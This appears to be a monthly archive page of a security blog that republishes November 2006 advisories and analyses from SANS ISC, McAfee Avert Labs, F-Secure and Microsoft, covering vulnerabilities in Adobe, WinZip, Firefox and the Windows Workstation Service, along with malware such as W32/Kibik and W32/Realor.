November 2006 - Posts

New Adobe vulnerability (NEW)

Published: 2006-11-29,
Last Updated: 2006-11-29 18:34:37 UTC by Toby Kohlenberg (Version: 1)

Frank Klein has written to let us know that there are new vulnerabilities in Adobe Acrobat and Acrobat Reader that have the potential for code execution as a result of incorrect argument handling in the ActiveX control for IE. There is no patch currently available and Adobe is offering a mitigation of deleting the control. FrSIRT has provided a kill bit option that you can set that should disable the control.

The vulnerable versions are:
Adobe Standard, Reader & Professional 7.0.0 - 7.0.8

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

BuddyProfile used to spread exploits

Alright, back to the doom and gloom! ;)

A little background info - is a site meant to allow you to spiff up your Buddy Profile for AOL Instant Messenger (AIM). It seems to be popular with a youngish teenage audience; it’s in the top 100,000 sites according to Alexa. It’s this particular fact which makes all the drama that follows just that more disturbing.

The basic problem is one we’ve seen before - When users are free to add their own HTML content with minimal restrictions, people will find a way to add objectionable content like malware and adware.
A SiteAdvisor crawl today turned up some profiles on which immediately redirect the user to an adult site, which points to a file which is detected as Exploit-ANIfile, which is being used to install Adware-PestTrap which then displays “security warnings” to the user.
Just to recap:

  1. Popular site, frequented by a large number of kids
  2. Allows users to add their own HTML content
  3. HTML content is being used on profiles to redirect people browsing this site (presumably said kids) to porn and surreptitiously-installed adware programs

Yuck. Seriously.
I think one of our Site Advisor researchers, Harry Sverdlove, put it best. He likened sites allowing users to embed their own HTML content into profile pages to restaurants letting people bring in their own food to be served to everyone:

“I’ll take the salmonella and the botulism ‘to go’ please.”

Computer Security Research - McAfee Avert Labs Blog.

Backdoor Trojans significant and tangible threat to Windows users - MS Antimalware Team

Published: 2006-11-26,
Last Updated: 2006-11-26 17:04:40 UTC by Patrick Nolan (Version: 1)

Windows Malicious Software Removal Tool: Progress Made, Trends Observed is a paper published in early November by the Microsoft Antimalware Team giving "perspective of the malware landscape based on the data collected by the MSRT". The tool, by default, "only looks for malware that are currently running or linked to through an auto-start point, such as in the registry.".

Anyone with network security monitoring or malware IR responsibilities should consider giving it a read. Some highlights (ymmv) include;

"Backdoor Trojans" .... "are a significant and tangible threat to Windows users.".

"Out of the 5.7 million computers cleaned, the MSRT has removed a backdoor Trojan from over 3.5 million (62%) of them.". "Bots, a sub-category of backdoor Trojans" ..... "represent a majority of the removals.". Rbot, Sdbot, and Gaobot "compose three of the top five slots in terms of total number of removals.".

"The increase in Win32/Rbot removals is due to a large number of variants of that malware family being added to the MSRT each release. On average, approximately 2,000 new variants of Win32/Rbot have been added to the tool each month.".

Correlations in the paper;

"The largest correlation shown" .... "is between rootkits and backdoor Trojans. In approximately 20% of the cases in which a rootkit was found on a computer, at least one backdoor Trojan was found as well. This emphasizes the trend of a large number of rootkits being distributed or leveraged by backdoor Trojans."  (handler emphasis/bold). "The percentages are also high between P2P worms and backdoor Trojans and IM worms and backdoor Trojans. The high values here are also expected given that many P2P worms and IM worms will often drop bots on the computer when they are run."

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Zero day Warezov Posted by Mikko @ 09:52 GMT

We've been busy with the latest spam runs of the Warezov family over the last hours.

We've added detection for the following variants, and there are probably more on the way:



Updated to add: New domain - RXFF - See the list.

F-Secure : News from the Lab - November of 2006.

please ignore
Technorati Profile

Reverse Cross-Site Request (RCSR) vulnerability (NEW)

Published: 2006-11-22,
Last Updated: 2006-11-22 14:43:18 UTC by Adrien de Beaupre (Version: 1)

A new vulnerability in Firefox has been recently disclosed. The password saving functionality of Firefox can be exploited to expose usernames and passwords to other sites, such as those used for blogs or any page requesting user input. The proof of concept page shows the username and password input in a google URL. They are calling it a Reverse Cross-Site Request (RCSR) vulnerability. The advisory appears here. This type of attack vector appears to also affect Internet Explorer.

Bugzilla link.

Mozilla has apparently been advised of the vulnerability, there currently is no vendor patch. The workaround in this particular case would be to never use Firefox to save passwords for any web site. The option is under Tools, Options, Security. Here is a link showing how to disable it.

Thanks to our reader Carsten for letting us know.

Adrien de Beaupre

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Time to get patching!!

“Microsoft is aware of public proof of concept code targeting the vulnerability addressed by security update MS06-070. At this time Microsoft has not seen any indications of active exploitation of the vulnerability Microsoft has activated its emergency response process and is continuing to investigate this public report.

Microsoft continues to recommend that customers apply the November updates as soon as possible with additional urgency and consideration given to the update detailed in
MS06-070. Customers can ensure that the updates are being installed by enabling the Automatic Updates feature in Windows or by using their deployment infrastructure in their enterprise or small business.”


Title: Microsoft Security Advisory Notification

Issued: November 16, 2006


Security Advisories Updated or Released Today ==============================================

* Microsoft Security Advisory (928604)

- Title: Exploit Code Published Affecting the Workstation Service on Windows 2000


- Revision Note: Advisory published.



This detection covers exploits targeting a WinZip FileView ActiveX Control vulnerability that can result in the execution of arbitrary code.

As this threat utilizes script in order to carry out exploitation, VirusScan's ScriptScan component, or a gateway scanner, is required for the DAT files to offer protection from this threat. Identification is available via other DAT consuming scanners.

For more details on the vulnerability that is exploited by this threat, see:


Discovered: November 16, 2006
Updated: November 16, 2006 11:23:20 AM PST
Type: Trojan Horse, Virus, Worm
Systems Affected: Windows 2000, Windows XP
CVE References: CVE-2006-4691

Bloodhound.Exploit.99 is a heuristic detection for the Microsoft Windows Workstation Service Could Allow Remote Code Execution Vulnerability, (as described in Microsoft Security Bulletin MS06-070).

Bloodhound.Exploit.99 -

Honeypot Mirroring .edu domains under .eu / Active Threat (NEW)

Published: 2006-11-16,
Last Updated: 2006-11-16 20:50:04 UTC by John Bambenek (Version: 1)


The .eu top-level domain is relatively new and in the build-up phase and had a co-worker notice something fun.

When ssh'ing to a local server, he typo'd and finished the DNS name as .eu, it connected with an SSH handshake (it was a new server so the key warning wasn't considered a big deal) and took a password. The individual immediately recognized the problem when the password wasn't accepted and we investigated.

It appears any DNS name at would resolve to this machine.  Not only that, but the machine in question was hosting at least 7 other domains under .eu that would map to an educational institution. For instance, for "fake" educational institution at you could search for and get a response to this machine.

response: (good)

response: (bad)

nslookup (XXX = anything whether or not it exists on the .edu side)
response: (bad)

It appears that this machine will take anything from certain domains and resolve it, whether or not the dnsname actually exists on your end. (i.e. wildcard)

What is appears, for the moment, is that this machine is running a honeypot to capture passwords for people who typo .edu as .eu.  However, with a little ingenuity they could turn this enterprise into something truly evil. Right now it is only running a few token services and the webpage appears to be hosting "non-content". There are some who think this is "legit".

With this main .edu's pointing to the same place to a box with non-content, I'm not buying it. Incidents like this are a good reason to be cautious, particularly when the mitigation is as non-involved as it is.


Check your .edu to see if it resolves as an .eu (i.e. nslookup and see what happens).

If you get, they are mirroring your .edu.

Filter that IP in both directions and pursue what other avenues your lawyers think necessary (i.e. lock down the .eu equivalent of your domain).

I'm interested in how wide-spread this is, and would like a report if your .edu is affected.

John Bambenek
bambenek /at/ gmail [dot] com

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Microsoft patches 11 critical vulnerabilities, one worm candidate

This month, Microsoft has patched 13 vulnerabilities. Among them is one that can be used to create a worm targeting Windows 2000 systems. The MS06-070 Workstation Service vulnerability can be remotely exploited without user interaction. On Windows 2000, no authentication is needed when sending traffic to this service. Details on this vulnerability have been published.
The vulnerabilities in Internet Explorer DirectAnimation.PathControl AxtiveX object and in XML Core Service, both exploited in the wild, have been addressed in this month’s patch cycle.
The update of
our graphs of last month is found below. The graphs show that Microsoft is continuing the trend of patching a large number of critical vulnerabilities each month.
Critical vulnerabilities addressed by MicrosoftImportant vulnerabilities addressed by Microsoft

Computer Security Research - McAfee Avert Labs Blog.


Title: Microsoft Security Bulletin Minor Revisions

Issued: November 16, 2006




The following bulletins have undergone a minor revision increment.

Please see the appropriate bulletin for more details.




Bulletin Information:



- Reason for revision: Bulletin revised to call out Microsoft Windows XP Professional x64 Edition as affected software.

- Updated: November 15, 2006

- Bulletin Severity Rating: Critical

- Version: 1.1


- Reason for revision: Bulletin revised to clarify that this security update installs Flash6.ocx version and removes

the version of Flash.ocx it is replacing.

- Updated: November 15, 2006

- Bulletin Severity Rating: Critical

- Version: 1.1


- Reason for revision: Executable name for msxml6 has been updated with correct name and log file has been updated with

correct KB number. Additional clarification has also been added to clarify which components of the previous Bulletin this update replaces.

- Updated: November 15, 2006

- Bulletin Severity Rating: Critical

- Version: 1.1


The 2007 Botnet Package - 0-day + Parasite + Google ?

On Sunday November 5th, we blogged about a 0-day exploit discovered in the wild that was targeting a Microsoft XML Core Services vulnerability. McAfee Avert Labs had been tracking and monitoring the payload deployed by this exploit.

W32/Kibik.a was the detection name assigned on Sunday, which was soon included in the McAfee VirusScan DAT release the following week. With rootkit heuristics, behavioral detection and IP blacklists being the talk of the (security) town in recent years, W32/Kibik.a makes an interesting attempt to survive in this competitive matrix of today.

W32/Kibik.a is a parasite that attaches to Windows Explorer (explorer.exe), even covering backup copies of explorer.exe in system restore, service pack installation and windows installer folders, making it a hard time for the victims to restore the original system file. On the process list, explorer.exe has its perfectly legitimate presence; on disk, the infected explorer.exe file has no distinction in filesize because W32/Kibik.a attaches to unused segments in the original file. Behavioral detection products looking for rootkit characteristics or autorun register keys will find nothing, because there isn’t any rootkit or autorun key.

To make it even difficult to track for network administrators, W32/Kibik.a sends innocent looking search requests to Google Blogsearch - only the search keywords are unique hexadecimal strings. Google Blogsearch, unlike Google Web Search that we are most familiar with, indexes blog entries with RSS and Atom feeds from blog authors. This makes blog content more readily searchable than Web search. When indexed, search results can return dynamic data, such as URLs to download, or commands to execute in a synchronized manner. At the time of writing, W32/Kibik.a’s searches have not yielded any results thus far.

From silent installation via a 0-day exploit, to silent residence and operations and virtually silent and innocent looking Google search; W32/Kibik.a could well be the start of a new trend in scalable remote controlled malware (a.k.a. botnet) in 2007. It is no wonder with its stealthy elements, few security vendors had detected or repaired W32/Kibik.a to date.

McAfee Avert Labs continues to monitor W32/Kibik.a and other malware using these techniques.

Virus Total Results 11.15.2006

Computer Security Research - McAfee Avert Labs Blog.

Critical security vulnerability in WinZip 10 (NEW)

Published: 2006-11-15,
Last Updated: 2006-11-15 09:40:27 UTC by Bojan Zdrnja (Version: 2(click to highlight changes))
WinZip Computing released a new build of WinZip 10 that fixes a critical security vulnerability in this popular ZIP program.

The vulnerability exists in an ActiveX component that is shipped with WinZip 10 only (so if you are running previous versions of WinZip you are not affected by this vulnerability). This ActiveX component is marked safe for scripting which means that a remote attacker can exploit it if you visit a web page hosting the exploit.

Build 7245 of WinZip 10 is available at If you, for some reason, can not upgrade, you should disable the affected ActiveX control (WZFILEVIEW.FileViewCtrl.61) – its CLSID is A09AE68F-B14D-43ED-B713-BA413F034904.


MS06-067 ( actually disables this vulnerability. Beside the other things that this update does, it also sets the kill bits for vulnerable ActiveX components.

Thanks to Carl for spotting this.
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System


W32/Realor.worm - Infecting Movies for Fun and Profit

After Exploit-WMF and umpteen image file format exploits that followed, general computer users should understand that something not baring the file extension *.EXE
does not imply they are safe to view. Malware crafted out of document and media file formats are nothing new; nor are they a threat unique to Windows users. Before Word document 0-day’s made it into mainstream news headlines, there were text file exploits. More recently, there was Exploit-WinAmpPLS playing a spyware note; and a Microsoft security advistory for five critical Flash Player vulnerabilities today; as the music plays on.

Today, McAfee Avert Labs discovered W32/Realor.worm in the wild that was actively modifying all Real Media (*.rmvb) files in its path. These “infected” media files launch a malicious webpage without prompting, as they are being viewed by the user in Real media player. These files can be music or videos hosted on a network drive containing corporate presentations, a personal media server, or a P2P shared folder et cetera. When was the last time you hesitated in opening a movie file ?

As much as the new world of broadband multimedia presents new channels for entertainment and business opportunities, it is an attractive breeding ground for malware like any other popular application. Whether through a worm, using tools or hand-crafted, they are a penetration vector hard to resist for profiteering malware authors. McAfee Avert Labs recognises a rising trend in the manipulation of media files to embed or install malware. Heuristics and generic detection such as New Downloader.b
and Generic are only some of the proactive measures to block such attempts. Internet users are advised to be precautious with sharing media files on a publicly writable folder or viewing media files from unknown sources — like you would with unsolicited e-mails and *.EXE files.

Computer Security Research - McAfee Avert Labs Blog.

More Posts Next page »